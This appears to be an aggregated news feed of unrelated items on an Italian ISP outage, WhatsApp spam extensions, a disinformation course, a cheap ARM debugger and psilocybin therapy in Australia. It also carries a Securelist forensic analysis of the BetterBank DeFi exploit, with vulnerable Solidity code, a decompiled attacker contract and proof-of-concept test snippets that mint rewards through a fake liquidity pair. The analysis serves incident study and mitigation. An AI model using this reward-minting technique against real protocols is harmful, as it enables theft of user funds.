Nella giornata di oggi, migliaia di utenti Fastweb in tutta Italia hanno segnalato problemi di connessione alla rete fissa, con interruzioni improvvise del servizio Internet e difficoltà a navigare o accedere ai principali siti web.

Le segnalazioni, raccolte su piattaforme come DownDetector, hanno iniziato a crescere rapidamente dalle prime ore del mattino, raggiungendo oltre 35.000 segnalazioni nel giro di poche ore.
Le aree più colpite sembrano essere Milano, Roma, Torino, Bologna, Napoli, Palermo e Firenze, ma i disservizi si sono estesi anche ad altre zone del Paese.

Molti utenti hanno lamentato assenza totale di connessione, problemi di routing e DNS, oltre a difficoltà nell’accesso a servizi Google, social network e piattaforme di streaming.

Dopo la pubblicazione del nostro articolo, Fastweb ha contattato Red Hot Cyber, fornendo una comunicazione ufficiale sullo stato della situazione:

Fastweb conferma che è in corso un disservizio temporaneo su rete fissa. I tecnici sono al lavoro per ripristinare i servizi nel minor tempo possibile. Fastweb si scusa con i clienti coinvolti e provvederà ad aggiornare tempestivamente sull’avanzamento dei lavori.

Al momento, i tecnici dell’azienda stanno lavorando per individuare la causa precisa del guasto e ripristinare progressivamente i collegamenti. La società invita i clienti coinvolti a monitorare i propri canali ufficiali per ricevere aggiornamenti in tempo reale sull’avanzamento dei lavori.

Red Hot Cyber continuerà a seguire la vicenda e a fornire aggiornamenti non appena saranno disponibili nuove informazioni.

L'articolo Fastweb conferma il problema e fornisce una dichiarazione ufficiale proviene da Red Hot Cyber.

I ricercatori hanno scoperto 131 estensioni per automatizzare il funzionamento di WhatsApp Web nello store ufficiale di Chrome. Tutte venivano utilizzate per inviare spam di massa agli utenti brasiliani.

Secondo gli analisti di Socket, tutte queste estensioni condividono la stessa base di codice, gli stessi design pattern e la stessa infrastruttura. Insieme, contano circa 20.905 utenti attivi.

“Non si tratta di un malware classico; è una campagna di spam automatizzata ad alto rischio che viola le regole della piattaforma”, spiega Kirill Boychenko, specialista di Socket. “Il codice viene iniettato direttamente nella pagina Web di WhatsApp, collaborando con gli script di WhatsApp per automatizzare gli invii di massa e la pianificazione in modo da aggirare la protezione anti-spam.”

L’obiettivo finale di questa campagna è inviare messaggi di massa tramite WhatsApp in modo da aggirare i limiti di frequenza dei messaggi e la protezione antispam della piattaforma. I ricercatori scrivono che questa attività è in corso da almeno nove mesi, con nuovi download e aggiornamenti delle estensioni osservati solo il 17 ottobre 2025.

Ogni estensione utilizza un nome e un logo diversi, ma la maggior parte è pubblicata dagli sviluppatori WL Extensão e WLExtensao. A volte, le estensioni vengono pubblicizzate come strumenti CRM per WhatsApp, promettendo di massimizzare le vendite tramite la versione web del messenger.

Gli esperti ritengono che tali differenze nel branding siano il risultato del franchising, che consente agli operatori di estensioni di inondare il Chrome Web Store con cloni dell’estensione ZapVende originale creata da DBX Tecnologia.

“Trasforma WhatsApp in un potente strumento di vendita e gestione dei contatti. Con Zap Vende avrai accesso a un CRM intuitivo, all’automazione dei messaggi, all’invio di email di massa, a un funnel di vendita visivo e molto altro”, si legge nella descrizione di un’estensione nel Chrome Web Store. “Organizza il servizio clienti, monitora i lead e pianifica i messaggi in modo pratico ed efficace.”

Secondo Socket, DBX Technology pubblicizza un programma di rivendita white-label che consente ai potenziali partner di rinnovare il marchio e vendere l’estensione WhatsApp Web con il proprio marchio. I ricercatori sottolineano che tutto ciò viola la politica antispam e antiabuso del Chrome Web Store. In particolare, agli sviluppatori e ai loro partner è vietato ospitare più estensioni con funzionalità duplicate sulla piattaforma.

Inoltre, è stato scoperto che DBX aveva pubblicato su YouTube dei video su come aggirare gli algoritmi anti-spam di WhatsApp quando si utilizzano tali estensioni.

L'articolo Scoperte 131 estensioni Chrome per WhatsApp Web utilizzate per spam di massa proviene da Red Hot Cyber.

Agenzia per la Cybersicurezza Nazionale – Sala ACN, Corso d’Italia, 41, 00198, Roma

Il corso formativo concernerà il fenomeno dell’information disorder (lett. disordine informativo) e delle fake news, con particolare attenzione al quadro giuridico nazionale, europeo e internazionale e ai possibili rimedi. L’obiettivo è quello di fornire ai giornalisti strumenti utili per riconoscere e contrastare tale fenomeno, nell’interesse della qualità dell’informazione e della tutela del diritto dei cittadini a ricevere notizie verificate e attendibili.

Il corso si propone di approfondire i profili giuridici legati alla libertà di espressione, alla regolamentazione dell’informazione e alle responsabilità degli attori digitali.

Verranno esaminati strumenti normativi e casi concreti, nazionali e internazionali, per aiutare i giornalisti a orientarsi in un panorama sempre più complesso e sfidante. L’argomento è di rilevante importanza giornalistica per l’impatto che ha sulla credibilità dell’informazione e sul ruolo democratico della stampa. Verrà analizzato l’articolo 21 della Costituzione italiana, che tutela della libertà di espressione e di stampa, in cui ognuno ha il diritto di manifestare liberamente il proprio pensiero con qualsiasi mezzo di diffusione, ponendo le basi per una tutela ampia della libertà di espressione e informazione.

Con la digitalizzazione dell’informazione, le PSYOPS (psycological operations) hanno acquisito una potenza senza precedenti, diventando uno strumento chiave nei conflitti ibridi e nell’influenza mediatica globale. La manipolazione dell’informazione e dell’opinione pubblica, ingannare e arrecare danno a individui o società incide a livello multidimensionale, coinvolgendo diritto, politica, comunicazione, tecnologia, salute, cultura, sociale, ambiente e così via. Si osserverà come si può facilmente influenzare sentimenti, pensieri e azioni di un pubblico specifico, al fine di ottenere vantaggi strategici in ambito politico, militare o sociale.

Verranno illustrati diversi esempi di diffusione di fake news, alterazione di contenuti, uso strategico dei social per destabilizzare o polarizzare l’opinione pubblica. Si prenderà in esame l’articolo 19 del nuovo Codice Deontologico delle Giornaliste e dei Giornalisti che introduce una regola specifica sull’uso dell’intelligenza artificiale. In primo luogo, viene stabilito un principio fondamentale: le nuove tecnologie possono affiancare il lavoro giornalistico, ma non possono mai sostituirlo. Se una o un giornalista decide di utilizzare strumenti di intelligenza artificiale, ha il dovere di dichiararlo apertamente, sia nella produzione sia nell’elaborazione di testi, immagini o materiali sonori. Resta comunque sua la piena responsabilità del contenuto e del risultato finale, e deve sempre chiarire in che modo l’IA abbia contribuito al lavoro svolto. Inoltre, anche quando fa ricorso a queste tecnologie, la giornalista o il giornalista deve continuare a verificare attentamente fonti, dati e informazioni, garantendone la veridicità. L’uso dell’intelligenza artificiale, infatti, non può mai essere invocato come giustificazione per eludere i doveri deontologici che regolano la professione.

Introduzione:

Bruno Frattasi, direttore generale dell’Agenzia per la cybersicurezza nazionale (ACN);

Guido D’Ubaldo, presidente dell’Ordine dei Giornalisti del Lazio;

Carlo Bartoli, presidente nazionale dell’Ordine dei Giornalisti;

Vittorio Rizzi, direttore generale del DIS;

Lorenzo Guerini, CPASIR (Comitato Parlamentare per la Sicurezza della Repubblica);

Stefano Mannino, Generale di Corpo d’Armata (Esercito Italiano) e Presidente del Centro Alti Studi Difesa/Scuola Superiore Universitaria ad Ordinamento Speciale (CASD/SSUOS)

Relatori:

Arturo Di Corinto, Public Affairs and Communication Advisor nell’Agenzia per la cybersicurezza nazionale (ACN);

Ranieri Razzante, professore e avvocato, docente di Cybercrime Università di Perugia e Membro Comitato per la strategia su IA;

Federica Fabrizzi, professoressa ordinaria di Diritto dell’informazione presso il Dipartimento di Scienze Politiche dell’Università La Sapienza di Roma;

Oreste Pollicino, professore ordinario di Diritto costituzionale e regolamentazione dell’intelligenza artificiale alla Bocconi;

Luigi Camilloni, direttore responsabile dell’Agenparl (Agenzia parlamentare) ed esperto in PSYOPS;

Laura Camilloni, caporedattore dell’Agenparl (Agenzia parlamentare) ed esperta in information disorder;

Manuela Biancospino, consigliera dell’Ordine dei Giornalisti del Lazio

dicorinto.it/formazione/notizi…

Executive summary

From August 26 to 27, 2025, BetterBank, a decentralized finance (DeFi) protocol operating on the PulseChain network, fell victim to a sophisticated exploit involving liquidity manipulation and reward minting. The attack resulted in an initial loss of approximately $5 million in digital assets. Following on-chain negotiations, the attacker returned approximately $2.7 million in assets, mitigating the financial damage and leaving a net loss of around $1.4 million. The vulnerability stemmed from a fundamental flaw in the protocol’s bonus reward system, specifically in the swapExactTokensForFavorAndTrackBonus function. This function was designed to mint ESTEEM reward tokens whenever a swap resulted in FAVOR tokens, but critically, it lacked the necessary validation to ensure that the swap occurred within a legitimate, whitelisted liquidity pool.

A prior security audit by Zokyo had identified and flagged this precise vulnerability. However, due to a documented communication breakdown and the vulnerability’s perceived low severity, the finding was downgraded, and the BetterBank development team did not fully implement the recommended patch. This incident is a pivotal case study demonstrating how design-level oversights, compounded by organizational inaction in response to security warnings, can lead to severe financial consequences in the high-stakes realm of blockchain technology. The exploit underscores the importance of thorough security audits, clear communication of findings, and multilayered security protocols to protect against increasingly sophisticated attack vectors.

In this article, we will analyze the root cause, impact, and on-chain forensics of the helper contracts used in the attack.

Incident overview

Incident timeline

The BetterBank exploit was the culmination of a series of events that began well before the attack itself. In July 2025, approximately one month prior to the incident, the BetterBank protocol underwent a security audit conducted by the firm Zokyo. The audit report, which was made public after the exploit, explicitly identified a critical vulnerability related to the protocol’s bonus system. Titled “A Malicious User Can Trade Bogus Tokens To Qualify For Bonus Favor Through The UniswapWrapper,” the finding was a direct warning about the exploit vector that would later be used. However, based on the documented proof of concept (PoC), which used test Ether, the severity of the vulnerability was downgraded to “Informational” and marked as “Resolved” in the report. The BetterBank team did not fully implement the patched code snippet.

The attack occurred on August 26, 2025. In response, the BetterBank team drained all remaining FAVOR liquidity pools to protect the assets that had not yet been siphoned. The team also took the proactive step of announcing a 20% bounty for the attacker and attempted to negotiate the return of funds.

Remarkably, these efforts were successful. On August 27, 2025, the attacker returned a significant portion of the stolen assets – 550 million DAI tokens. This partial recovery is not a common outcome in DeFi exploits.

Financial impact

This incident had a significant financial impact on the BetterBank protocol and its users. Approximately $5 million worth of assets was initially drained. The attack specifically targeted liquidity pools, allowing the perpetrator to siphon off a mix of stablecoins and native PulseChain assets. The drained assets included 891 million DAI tokens, 9.05 billion PLSX tokens, and 7.40 billion WPLS tokens.

In a positive turn of events, the attacker returned approximately $2.7 million in assets, specifically 550 million DAI. These funds represented a significant portion of the initial losses, resulting in a final net loss of around $1.4 million. This figure speaks to the severity of the initial exploit and the effectiveness of the team’s recovery efforts. While data from various sources show minor fluctuations in reported values due to real-time token price volatility, they consistently point to these key figures.

A detailed breakdown of the losses and recovery is provided in the following table:

Protocol description and vulnerability analysis

The BetterBank protocol is a decentralized lending platform on the PulseChain network. It incorporates a two-token system that incentivizes liquidity provision and engagement. The primary token is FAVOR, while the second, ESTEEM, acts as a bonus reward token. The protocol’s core mechanism for rewarding users was tied to providing liquidity for FAVOR on decentralized exchanges (DEXs). Specifically, a function was designed to mint and distribute ESTEEM tokens whenever a trade resulted in FAVOR as the output token. While seemingly straightforward, this incentive system contained a critical design flaw that an attacker would later exploit.

The vulnerability was not a mere coding bug, but a fundamental architectural misstep. By tying rewards to a generic, unvalidated condition – the appearance of FAVOR in a swap’s output – the protocol created an exploitable surface. Essentially, this design choice trusted all external trading environments equally and failed to anticipate that a malicious actor could replicate a trusted environment for their own purposes. This is a common failure in tokenomics, where the focus on incentivization overlooks the necessary security and validation mechanisms that should accompany the design of such features.

The technical root cause of the vulnerability was a fundamental logic flaw in one of BetterBank’s smart contracts. The vulnerability was centered on the swapExactTokensForFavorAndTrackBonus function. The purpose of this function was to track swaps and mint ESTEEM bonuses. However, its core logic was incomplete: it only verified that FAVOR was the output token from the swap and failed to validate the source of the swap itself. The contract did not check whether the transaction originated from a legitimate, whitelisted liquidity pool or a registered contract. This lack of validation created a loophole that allowed an attacker to trigger the bonus system at will by creating a fake trading environment.

This primary vulnerability was compounded by a secondary flaw in the protocol’s tokenomics: the flawed design of convertible rewards.

The ESTEEM tokens, minted as a bonus, could be converted back into FAVOR tokens. This created a self-sustaining feedback loop. An attacker could trigger the swapExactTokensForFavorAndTrackBonus function to mint ESTEEM, and then use those newly minted tokens to obtain more FAVOR. The FAVOR could then be used in subsequent swaps to mint even more ESTEEM rewards. This cyclical process enabled the attacker to generate an unlimited supply of tokens and drain the protocol’s real reserves. The synergistic combination of logic and design flaws created a high-impact attack vector that was difficult to contain once initiated.

To sum it up, the BetterBank exploit was the result of a critical vulnerability in the bonus minting system that allowed attackers to create fake liquidity pairs and harvest an unlimited amount of ESTEEM token rewards. As mentioned above, the system couldn’t distinguish between legitimate and malicious liquidity pairs, creating an opportunity for attackers to generate illegitimate token pairs. The BetterBank system included protection measures against attacks capable of inflicting substantial financial damage – namely a sell tax. However, the threat actors were able to bypass this tax mechanism, which exacerbated the impact of the attack.

Exploit breakdown

The exploit targeted the bonus minting system of the favorPLS.sol contract, specifically the logBuy() function and related tax logic. The key vulnerable components are:

1. File: favorPLS.sol
2. Vulnerable function: logBuy(address user, uint256 amount)
3. Supporting function: calculateFavorBonuses(uint256 amount)
4. Tax logic: _transfer() function

The logBuy function only checks if the caller is an approved buy wrapper; it doesn’t validate the legitimacy of the trading pair or liquidity source.
function logBuy(address user, uint256 amount) external {
require(isBuyWrapper[msg.sender], "Only approved buy wrapper can log buys");

(uint256 userBonus, uint256 treasuryBonus) = calculateFavorBonuses(amount);
pendingBonus[user] += userBonus;

esteem.mint(treasury, treasuryBonus);
emit EsteemBonusLogged(user, userBonus, treasuryBonus);
The tax only applies to transfers to legitimate, whitelisted addresses that are marked as isMarketPair[recipient]. By definition, fake, unauthorized LPs are not included in this mapping, so they bypass the maximum 50% sell tax imposed by protocol owners.
function _transfer(address sender, address recipient, uint256 amount) internal override {
uint256 taxAmount = 0;

if (_isTaxExempt(sender, recipient)) {
super._transfer(sender, recipient, amount);
return;
}

// Transfer to Market Pair is likely a sell to be taxed
if (isMarketPair[recipient]) {
taxAmount = (amount * sellTax) / MULTIPLIER;
}

if (taxAmount > 0) {
super._transfer(sender, treasury, taxAmount);
amount -= taxAmount;
}

super._transfer(sender, recipient, amount);
}
The uniswapWraper.sol contract contains the buy wrapper functions that call logBuy(). The system only checks if the pair is in allowedDirectPair mapping, but this can be manipulated by creating fake tokens and adding them to the mapping to get them approved.
function swapExactTokensForFavorAndTrackBonus(
uint amountIn,
uint amountOutMin,
address[] calldata path,
address to,
uint256 deadline
) external {
address finalToken = path[path.length - 1];
require(isFavorToken[finalToken], "Path must end in registered FAVOR");
require(allowedDirectPair[path[0]][finalToken], "Pair not allowed");
require(path.length == 2, "Path must be direct");

// ... swap logic ...

uint256 twap = minterOracle.getTokenTWAP(finalToken);
if(twap < 3e18){
IFavorToken(finalToken).logBuy(to, favorReceived);
}
}

Step-by-step attack reconstruction

The attack on BetterBank was not a single transaction, but rather a carefully orchestrated sequence of on-chain actions. The exploit began with the attacker acquiring the necessary capital through a flash loan. Flash loans are a feature of many DeFi protocols that allow a user to borrow large sums of assets without collateral, provided the loan is repaid within the same atomic transaction. The attacker used the loan to obtain a significant amount of assets, which were then used to manipulate the protocol’s liquidity pools.

The attacker used the flash loan funds to target and drain the real DAI-PDAIF liquidity pool, a core part of the BetterBank protocol. This initial step was crucial because it weakened the protocol’s defenses and provided the attacker with a large volume of PDAIF tokens, which were central to the reward-minting scheme.

Capital acquisition

After draining the real liquidity pool, the attacker moved to the next phase of the operation. They deployed a new, custom, and worthless ERC-20 token. Exploiting the permissionless nature of PulseX, the attacker then created a fake liquidity pool, pairing their newly created bogus token with PDAIF.

This fake pool was key to the entire exploit. It enabled the attacker to control both sides of a trading pair and manipulate the price and liquidity to their advantage without affecting the broader market.

One critical element that made this attack profitable was the protocol’s tax logic. BetterBank had implemented a system that levied high fees on bulk swaps to deter this type of high-volume trading. However, the tax only applied to “official” or whitelisted liquidity pairs. Since the attacker’s newly created pool was not on this list, they were able to conduct their trades without incurring any fees. This critical loophole ensured the attack’s profitability.

Fake LP pair creation

After establishing the bogus token and fake liquidity pool, the attacker initiated the final and most devastating phase of the exploit: the reward minting loop. They executed a series of rapid swaps between their worthless token and PDAIF within their custom-created pool. Each swap triggered the vulnerable swapExactTokensForFavorAndTrackBonus function in the BetterBank contract. Because the function did not validate the pool, it minted a substantial bonus of ESTEEM tokens with each swap, despite the illegitimacy of the trading pair.

Each swap triggers:

• swapExactTokensForFavorAndTrackBonus()
• logBuy() function call
• calculateFavorBonuses() execution
• ESTEEM token minting (44% bonus)
• fake LP sell tax bypass

Reward minting loop

The newly minted ESTEEM tokens were then converted back into FAVOR tokens, which could be used to facilitate more swaps. This created a recursive loop that allowed the attacker to generate an immense artificial supply of rewards and drain the protocol’s real asset reserves. Using this method, the attacker extracted approximately 891 million DAI, 9.05 billion PLSX, and 7.40 billion WPLS, effectively destabilizing the entire protocol. The success of this multi-layered attack demonstrates how a single fundamental logic flaw, combined with a series of smaller design failures, can lead to a catastrophic outcome.

Economic impact comparison

Mitigation strategy

This attack could have been averted if a number of security measures had been implemented.

First, the liquidity pool should be verified during a swap. The LP pair and liquidity source must be valid.
function logBuy(address user, uint256 amount) external {
require(isBuyWrapper[msg.sender], "Only approved buy wrapper can log buys");

// ADD: LP pair validation
require(isValidLPPair(msg.sender), "Invalid LP pair");
require(hasMinimumLiquidity(msg.sender), "Insufficient liquidity");
require(isVerifiedPair(msg.sender), "Unverified trading pair");

// ADD: Amount limits
require(amount <= MAX_SWAP_AMOUNT, "Amount exceeds limit");

(uint256 userBonus, uint256 treasuryBonus) = calculateFavorBonuses(amount);
pendingBonus[user] += userBonus;

esteem.mint(treasury, treasuryBonus);
emit EsteemBonusLogged(user, userBonus, treasuryBonus);
}
The sell tax should be applied to all transfers.
function _transfer(address sender, address recipient, uint256 amount) internal override {
uint256 taxAmount = 0;

if (_isTaxExempt(sender, recipient)) {
super._transfer(sender, recipient, amount);
return;
}

// FIX: Apply tax to ALL transfers, not just market pairs
if (isMarketPair[recipient] || isUnverifiedPair(recipient)) {
taxAmount = (amount * sellTax) / MULTIPLIER;
}

if (taxAmount > 0) {
super._transfer(sender, treasury, taxAmount);
amount -= taxAmount;
}

super._transfer(sender, recipient, amount);
}
To prevent large-scale one-time attacks, a daily limit should be introduced to stop users from conducting transactions totaling more than 10,000 ESTEEM tokens per day.
mapping(address => uint256) public lastBonusClaim;
mapping(address => uint256) public dailyBonusLimit;
uint256 public constant MAX_DAILY_BONUS = 10000 * 1e18; // 10K ESTEEM per day

function logBuy(address user, uint256 amount) external {
require(isBuyWrapper[msg.sender], "Only approved buy wrapper can log buys");

// ADD: Rate limiting
require(block.timestamp - lastBonusClaim[user] > 1 hours, "Rate limited");
require(dailyBonusLimit[user] < MAX_DAILY_BONUS, "Daily limit exceeded");

// Update rate limiting
lastBonusClaim[user] = block.timestamp;
dailyBonusLimit[user] += calculatedBonus;

// ... rest of function
}

On-chain forensics and fund tracing

The on-chain trail left by the attacker provides a clear forensic record of the exploit. After draining the assets on PulseChain, the attacker swapped the stolen DAI, PLSX, and WPLS for more liquid, cross-chain assets. The perpetrator then bridged approximately $922,000 worth of ETH from the PulseChain network to the Ethereum mainnet. This was done using a secondary attacker address beginning with 0xf3BA…, which was likely created to hinder exposure of the primary exploitation address. The final step in the money laundering process was the use of a crypto mixer, such as Tornado Cash, to obscure the origin of the funds and make them untraceable.

Tracing the flow of these funds was challenging because many public-facing block explorers for the PulseChain network were either inaccessible or lacked comprehensive data at the time of the incident. This highlights the practical difficulties associated with on-chain forensics, where the lack of a reliable, up-to-date block explorer can greatly hinder analysis. In these scenarios, it becomes critical to use open-source explorers like Blockscout, which are more resilient and transparent.

The following table provides a clear reference for the key on-chain entities involved in the attack:

We managed to get hold of the attacker’s helper contracts to deepen our investigation. Through comprehensive bytecode analysis and contract decompilation, we determined that the attack architecture was multilayered. The attack utilized a factory contract pattern (0x792CDc4adcF6b33880865a200319ecbc496e98f8) that contained 18,219 bytes of embedded bytecode that were dynamically deployed during execution. The embedded contract revealed three critical functions: two simple functions (0x51cff8d9 and 0x529d699e) for initialization and cleanup, and a highly complex flash loan callback function (0x920f5c84) with the signature executeOperation(address[],uint256[],uint256[],address,bytes), which matches standard DeFi flash loan protocols like Aave and dYdX. Analysis of the decompiled code revealed that the executeOperation function implements sophisticated parameter parsing for flash loan callbacks, dynamic contract deployment capabilities, and complex external contract interactions with the PulseX Router (0x165c3410fc91ef562c50559f7d2289febed552d9).
contract BetterBankExploitContract {

function main() external {
// Initialize memory
assembly {
mstore(0x40, 0x80)
}

// Revert if ETH is sent
if (msg.value > 0) {
revert();
}

// Check minimum calldata length
if (msg.data.length < 4) {
revert();
}

// Extract function selector
uint256 selector = uint256(msg.data[0:4]) >> 224;

// Dispatch to appropriate function
if (selector == 0x51cff8d9) {
// Function: withdraw(address)
withdraw();
} else if (selector == 0x529d699e) {
// Function: likely exploit execution
executeExploit();
} else if (selector == 0x920f5c84) {
// Function: executeOperation(address[],uint256[],uint256[],address,bytes)
// This is a flash loan callback function!
executeOperation();
} else {
revert();
}
}

// Function 0x51cff8d9 - Withdraw function
function withdraw() internal {
// Implementation would be in the bytecode
// Likely withdraws profits to attacker address
}

// Function 0x529d699e - Main exploit function
function executeExploit() internal {
// Implementation would be in the bytecode
// Contains the actual BetterBank exploit logic
}

// Function 0x920f5c84 - Flash loan callback
function executeOperation(
address[] calldata assets,
uint256[] calldata amounts,
uint256[] calldata premiums,
address initiator,
bytes calldata params
) internal {
// This is the flash loan callback function
// Contains the exploit logic that runs during flash loan
}
}
The attack exploited three critical vulnerabilities in BetterBank’s protocol: unvalidated reward minting in the logBuy function that failed to verify legitimate trading pairs; a tax bypass mechanism in the _transfer function that only applied the 50% sell tax to addresses marked as market pairs; and oracle manipulation through fake trading volume. The attacker requested flash loans of 50M DAI and 7.14B PLP tokens, drained real DAI-PDAIF pools, and created fake PDAIF pools with minimal liquidity. They performed approximately 20 iterations of fake trading to trigger massive ESTEEM reward minting, converting the rewards into additional PDAIF tokens, before re-adding liquidity with intentional imbalances and extracting profits of approximately 891M DAI through arbitrage.

PoC snippets

To illustrate the vulnerabilities that made such an attack possible, we examined code snippets from Zokyo researchers.

First, a fake liquidity pool pair is created with FAVOR and a fake token is generated by the attacker. By extension, the liquidity pool pairs with this token were also unsubstantiated.
function _createFakeLPPair() internal {
console.log("--- Step 1: Creating Fake LP Pair ---");

vm.startPrank(attacker);

// Create the pair
fakePair = factory.createPair(address(favorToken), address(fakeToken));
console.log("Fake pair created at:", fakePair);

// Add initial liquidity to make it "legitimate"
uint256 favorAmount = 1000 * 1e18;
uint256 fakeAmount = 1000000 * 1e18;

// Transfer FAVOR to attacker
vm.stopPrank();
vm.prank(admin);
favorToken.transfer(attacker, favorAmount);

vm.startPrank(attacker);

// Approve router
favorToken.approve(address(router), favorAmount);
fakeToken.approve(address(router), fakeAmount);

// Add liquidity
router.addLiquidity(
address(favorToken),
address(fakeToken),
favorAmount,
fakeAmount,
0,
0,
attacker,
block.timestamp + 300
);

console.log("Liquidity added to fake pair");
console.log("FAVOR in pair:", favorToken.balanceOf(fakePair));
console.log("FAKE in pair:", fakeToken.balanceOf(fakePair));

vm.stopPrank();
}
Next, the fake LP pair is approved in the allowedDirectPair mapping, allowing it to pass the system check and perform the bulk swap transactions.
function _approveFakePair() internal {
console.log("--- Step 2: Approving Fake Pair ---");

vm.prank(admin);
routerWrapper.setAllowedDirectPair(address(fakeToken), address(favorToken), true);

console.log("Fake pair approved in allowedDirectPair mapping");
}
These steps enable exploit execution, completing FAVOR swaps and collecting ESTEEM bonuses.
function _executeExploit() internal {
console.log("--- Step 3: Executing Exploit ---");

vm.startPrank(attacker);

uint256 exploitAmount = 100 * 1e18; // 100 FAVOR per swap
uint256 iterations = 10; // 10 swaps

console.log("Performing %d exploit swaps of %d FAVOR each", iterations, exploitAmount / 1e18);

for (uint i = 0; i < iterations; i++) {
_performExploitSwap(exploitAmount);
console.log("Swap %d completed", i + 1);
}

// Claim accumulated bonuses
console.log("Claiming accumulated ESTEEM bonuses...");
favorToken.claimBonus();

vm.stopPrank();
}
We also performed a single swap in a local environment to demonstrate the design flaw that allowed the attackers to perform transactions over and over again.
function _performExploitSwap(uint256 amount) internal {
// Create swap path: FAVOR -> FAKE -> FAVOR
address[] memory path = new address[](2);
path[0] = address(favorToken);
path[1] = address(fakeToken);

// Approve router
favorToken.approve(address(router), amount);

// Perform swap - this triggers logBuy() and mints ESTEEM
router.swapExactTokensForTokensSupportingFeeOnTransferTokens(
amount,
0, // Accept any amount out
path,
attacker,
block.timestamp + 300
);
}
Finally, several checks are performed to verify the exploit’s success.
function _verifyExploitSuccess() internal {
uint256 finalFavorBalance = favorToken.balanceOf(attacker);
uint256 finalEsteemBalance = esteemToken.balanceOf(attacker);
uint256 esteemMinted = esteemToken.totalSupply() - initialEsteemBalance;

console.log("Attacker's final FAVOR balance:", finalFavorBalance / 1e18);
console.log("Attacker's final ESTEEM balance:", finalEsteemBalance / 1e18);
console.log("Total ESTEEM minted during exploit:", esteemMinted / 1e18);

// Verify the attack was successful
assertGt(finalEsteemBalance, 0, "Attacker should have ESTEEM tokens");
assertGt(esteemMinted, 0, "ESTEEM tokens should have been minted");

console.log("EXPLOIT SUCCESSFUL!");
console.log("Attacker gained ESTEEM tokens without legitimate trading activity");
}

Conclusion

The BetterBank exploit was a multifaceted attack that combined technical precision with detailed knowledge of the protocol’s design flaws. The root cause was a lack of validation in the reward-minting logic, which enabled an attacker to generate unlimited value from a counterfeit liquidity pool. This technical failure was compounded by an organizational breakdown whereby a critical vulnerability explicitly identified in a security audit was downgraded in severity and left unpatched.

The incident serves as a powerful case study for developers, auditors, and investors. It demonstrates that ensuring the security of a decentralized protocol is a shared, ongoing responsibility. The vulnerability was not merely a coding error, but rather a design flaw that created an exploitable surface. The confusion and crisis communications that followed the exploit are a stark reminder of the consequences when communication breaks down between security professionals and protocol teams. While the return of a portion of the funds is a positive outcome, it does not overshadow the core lesson: in the world of decentralized finance, every line of code matters, every audit finding must be taken seriously, and every protocol must adopt a proactive, multilayered defense posture to safeguard against the persistent and evolving threats of the digital frontier.

securelist.com/betterbank-defi…

[bogdanthegeek] has a lot of experience with the ARM platform, and their latest escapade into working with cheap ARM chips recovered from disposable vapes involved a realization that it was just plain wrong to debug such recovered silicon with something as expensive as a Pi Pico. No, they needed to build a debugger using the super cheap CH32V003.

What follows is an interesting tour around ARM Debug Access Probe (DAP) programmers and creating a practical USB-connected device that actually works with modern toolchains. The first problem to be solved was that of host connectivity. These days, it’s USB or go home, which immediately limits the microcontrollers you can choose. Luckily for [Bogdan], they were aware of the excellent work by [cnlohr] on wedging low-speed USB support onto the RISC-V CH32v003 with the software-only bit-banging rv003usb, which provided a starting point. The next issue was to check for interrupt-driven endpoint support (needed for low-speed USB) in the Mac OS X kernel, which they knew was being dropped at an alarming rate (well, at least for full-speed). Luckily, the CMSIS-DAP standard required support for interrupt-driven USB endpoints, so kernel support was likely intact.

Next, [Bogdan] noticed that the DAPLink project had been ported to the bigger, native-USB WCH chips like the CH32V203, so it was a matter of porting this code to the diminutive CH32V003 using the rv003usb stack for the USB support using [cnlohr]’s ch32fun toolchain. There were a few bumps along the way with a lack of clarity in the DAPLink code, and some inconsistencies (across platforms) with the USB library dependencies of the upstream tool pyOCD, but they did get some tools working on at least Mac OS and some others on Linux. Which was nice.

We’ve covered the CH32V003 a fair bit, with people trying to give it all kinds of big-CPU tricks, such as speech recognition (of sorts) or even building a supercluster.

hackaday.com/2025/10/22/worlds…

Testo preparato con Peppe Brescia

La crescente attenzione agli psichedelici nell’ambito della salute mentale vede nell’Australia uno dei paesi più all’avanguardia tra quelli in cui sono in corso sperimentazioni.

Dopo che nel 2023 sono stati regolamentati gli utilizzi medici dell’MDMA, la ricerca australiana sulle molecole psichedeliche è attualmente protagonista di ulteriori e interessanti sviluppi. La principale novità arriva da Optimi Health Corp., azienda canadese produttrice di MDMA e psilocibina nel rispetto della Good Medical Practice (GMP) necessarie per il riconoscimento in quanto farmaco.

La società ha recentemen annunciato l’inclusione delle capsule di psilocibina da 5 mg di propria produzione all’interno del programma di psicoterapia sostenuto da Medibank, compagnia assicurativa australiana intenzionata a offrire ai propri clienti un’importante alternativa terapeutica. L’iniziativa, avviata già nel 2023 mediante la copertura economica della terapia per il disturbo da stress post-traumatico a base di MDMA, viene ora significativamente ampliamenta.

Le capsule di psilocibina sono state rese disponibili sulla scorta dell’Authorized Prescribers Scheme, istituto che consente al personale medico autorizzato la prescrizione di determinati medicinali non approvati in un’ottica di facilitazione all’inserimento dei pazienti in percorsi terapeutici alternativi. In un primo momento, la sperimentazione è stata limitata alla città di Perth. La responsabilità della fornitura dei servizi clinici e della selezione della coorte è stata affidata a Emyria Limited, che opererà tramite il Centro Empax, situato a Perth e di proprietà della stessa agenzia.Per quanto riguarda invece la distribuzione del farmaco, Optimi ha delegato l’incarico a Mind Medicine Australia.

Il finanziamento è il risultato della partnership tra Optimi Health e Medibank, una delle maggiori compagnie assicurative sanitarie private operanti in Australia, e il progetto si inserisce nell’ambito di un investimento da 50 milioni di dollari da parte di Medibank, attiva da oltre cinque anni nella promozione dei programmi di salute mentale nonché nello sviluppo di terapie innovative. Dall’inizio di Ottobre 2025, Brisbane si è aggiunta a Perth tra le municipalità che consentono l’accesso al programma di Medibank: nel capoluogo del Queensland il trattamento verrà erogato nel comune di Windsor presso l’Avive Health, ospedale privato specializzato in salute mentale.

